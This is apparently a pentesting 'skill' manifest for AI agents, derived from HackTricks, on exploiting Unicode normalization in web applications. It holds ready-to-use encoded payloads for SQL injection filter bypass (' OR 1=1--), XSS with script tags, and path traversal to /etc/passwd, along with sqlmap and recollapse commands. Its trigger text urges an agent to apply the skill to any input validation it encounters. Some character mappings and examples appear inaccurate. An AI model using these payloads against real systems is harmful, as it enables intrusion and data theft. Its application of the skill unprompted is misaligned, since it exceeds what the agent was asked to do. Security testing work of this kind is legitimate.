Hacktricks-skills unicode-normalization-pentest

How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MD

source content

Unicode Normalization Pentesting

This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities occur when applications normalize Unicode input at different stages of processing, potentially bypassing security filters.

Quick Detection Test

Start with the Kelvin Sign test to detect if normalization is happening:

Send
```
KELVIN SIGN
```
(U+0212A) encoded as
```
%e2%84%aa
```
to any input field
If the application echoes back a plain
```
K
```
, Unicode normalization is being performed
This indicates potential for normalization-based bypass attacks

Understanding the Vulnerability

How It Works

Applications may normalize Unicode input at different processing stages:

Before filtering: Normalization happens first, then security filters run
After filtering: Filters run first, then normalization creates new characters
Inconsistent normalization: Different parts of the app use different algorithms

The Four Normalization Forms

Form	Description	Use Case
NFC	Canonical composition	Most common default
NFD	Canonical decomposition	Breaks characters into base + combining
NFKC	Compatibility composition	Converts compatibility characters
NFKD	Compatibility decomposition	Full compatibility breakdown

Attack Vectors

1. SQL Injection Filter Bypass

When applications filter dangerous characters but normalize afterward:

Target: Single quote

(0x27)

Unicode equivalent:
```
%ef%bc%87
```
(FULLWIDTH SINGLE QUOTATION MARK)

Payloads:

# Single quote injection
%ef%bc%87+or+1=1--+

# With Unicode equivalents for all characters
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

# Double quote variant
%ef%bc%82+or+1=1--+

# OR operator bypass
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

Key Unicode Mappings:

'  → %ef%bc%87  (FULLWIDTH SINGLE QUOTATION MARK)
"  → %ef%bc%82  (FULLWIDTH DOUBLE QUOTATION MARK)
|  → %ef%bd%9c  (FULLWIDTH VERTICAL LINE)
/  → %ef%bc%8f  (FULLWIDTH SOLIDUS)
-  → %ef%b9%a3  (FULLWIDTH HYPHEN-MINUS)
=  → %e2%81%bc  (DOUBLE VERTICAL LINE)
1  → %c2%b9     (SUPERSCRIPT ONE)
#  → %ef%b9%9f  (FULLWIDTH NUMBER SIGN)
*  → %ef%b9%a1  (FULLWIDTH ASTERISK)
o  → %e1%b4%bc  (OGAM LETTER ONN)
r  → %e1%b4%bf  (OGAM LETTER RRI)

2. XSS Bypass

Use Unicode characters that normalize to script-breaking characters:

Example payloads:

<script>alert(1)</script>
%e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E
%u226e%3Cscript%3Ealert(1)%3C/script%3E

Special K Polyglot:

%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83
# Normalizes to: Leonishan

3. Regex Fuzzing

When regex validation normalizes input but the actual usage doesn't:

Use recollapse tool:

# Generate variations of input to fuzz backend
pip install recollapse
recollapse "https://example.com/path"

Test for:

Open Redirect vulnerabilities
SSRF through URL validation bypass
Path traversal through normalized characters

4. Unicode Overflow

Exploit byte overflow to create unexpected ASCII characters:

Example: Characters that overflow to

(0x41):

```
0x4e41
```
→
```
A
```
```
0x4f41
```
→
```
A
```
```
0x5041
```
→
```
A
```
```
0x5141
```
→
```
A
```

Technique: Send multi-byte sequences where the last byte is your target character.

Testing Workflow

Step 1: Reconnaissance

Identify reflected parameters: Find input fields that echo back to output
Test Kelvin Sign: Send
```
%e2%84%aa
```
and check for
```
K
```
in response
Check normalization behavior: Compare responses with different Unicode forms

Step 2: Filter Analysis

Identify blocked characters: Test common dangerous characters (
```
'
```
,
```
"
```
,
```
<
```
,
```
>
```
, etc.)
Test Unicode equivalents: Replace blocked chars with Unicode variants
Check normalization timing: Determine if normalization happens before or after filtering

Step 3: Exploitation

Craft payloads: Use Unicode equivalents for your attack vectors
Test with sqlmap: Use the Unicode template for automated testing
Manual verification: Confirm the vulnerability works as expected

Step 4: Verification

Confirm bypass: Verify the attack succeeds through normalization
Document findings: Record which Unicode forms work
Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)

Tools and Resources

sqlmap Unicode Template

# Clone the template
git clone https://github.com/carlospolop/sqlmap_to_unicode_template

# Use with sqlmap
python sqlmap_to_unicode.py -u "http://target.com/page?id=1"

recollapse

# Generate input variations
pip install recollapse
recollapse "input_string"

Reference Tables

Common Scenarios

WAF Bypass

When WAF filters specific characters but normalizes afterward:

# Original blocked payload
' OR 1=1--

# Unicode bypass
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

Input Validation Bypass

When validation checks for specific patterns but normalizes before use:

# Blocked: <script>
# Bypass: %e2%89%ae%3Cscript%3E

Path Traversal

When path validation is bypassed through Unicode:

# Normal: ../../../etc/passwd
# Unicode: %c0%af%c0%af%c0%af%c0%af%c0%af%c0%afetc%c0%afpasswd

Best Practices

Always test normalization: Include Unicode tests in your standard pentest workflow
Document normalization behavior: Record which forms the application uses
Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
Consider encoding layers: URL encoding + Unicode encoding combinations
Check for inconsistent normalization: Different parts of the app may normalize differently